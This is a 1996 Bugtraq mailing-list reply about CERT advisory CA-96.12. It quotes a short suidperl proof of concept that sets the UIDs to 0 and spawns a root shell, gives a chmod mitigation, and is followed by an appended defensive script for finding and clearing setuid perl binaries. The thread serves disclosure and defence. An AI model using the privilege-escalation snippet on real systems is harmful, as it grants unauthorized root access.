Bugtraq mailing list archives

Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability


From: jseng () pobox org sg (James Seng)
Date: Sun, 30 Jun 1996 17:34:07 +1000


Actually, it should be suidperl, not perl.

It should read as

#!/usr/bin/suidperl
$>=0; $<=0; # Set effective UID ($>) and real UID ($<) to 0
exec("/bin/sh");

According to the advisory, perl4 and 5 are both susceptible to it so long as
you have enabled setuid bit emulation (which it is by default for most systems).

I just do "chmod u-s /usr/bin/*perl*" since I don't use it for suid scripts.

-James Seng

At 11:53 PM 6/29/96 -0400, Brian Tao wrote:
   Exactly which versions of perl are susceptible to this?  I tried
it using /usr/contrib/bin/perl on a BSD/OS 2.0 system as well as
/usr/bin/perl on FreeBSD 2.1/2.2 systems, and none gave a root shell.
--
Brian Tao (BT300, taob () io org, taob () ican net)
Systems and Network Administrator, Internet Canada Corp.
"Though this be madness, yet there is method in't"

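Added example, not part of the original thread: the "chmod u-s /usr/bin/*perl*" glob in the reply covers only /usr/bin, while the quoted message also mentions /usr/contrib/bin/perl, so this script looks for set-uid perl binaries in several directories and can clear the bit on each. The SEARCH_DIRS list and the function names are assumptions, not taken from the advisory.

```shell
#!/bin/sh
# Added example: audit for set-uid perl binaries beyond /usr/bin.
# SEARCH_DIRS is an assumed list; set it to where perl lives on your hosts.
SEARCH_DIRS="/usr/bin /usr/local/bin /usr/contrib/bin /bin /opt/bin"

# Print each regular file directly inside the given directories whose name
# contains "perl" and whose mode includes the set-uid bit (04000).
find_suid_perl() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -maxdepth 1 -type f -name '*perl*' -perm -4000 -print
    done
}

# Clear the set-uid bit on every file find_suid_perl reports (the reply's
# "chmod u-s"), printing each path changed. Returns 1 if any chmod fails.
# Assumes file names contain no newlines.
clear_suid_perl() {
    list=$(find_suid_perl "$@")
    [ -n "$list" ] || return 0
    rc=0
    while IFS= read -r f; do
        if chmod u-s "$f"; then
            echo "cleared set-uid: $f"
        else
            echo "could not change: $f" >&2
            rc=1
        fi
    done <<EOF
$list
EOF
    return "$rc"
}

# --report lists matches only; --fix also clears the bit (run as root).
# SEARCH_DIRS is left unquoted on purpose so it splits into directories.
case "${1:-}" in
    --report) find_suid_perl $SEARCH_DIRS ;;
    --fix)    clear_suid_perl $SEARCH_DIRS ;;
esac
```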



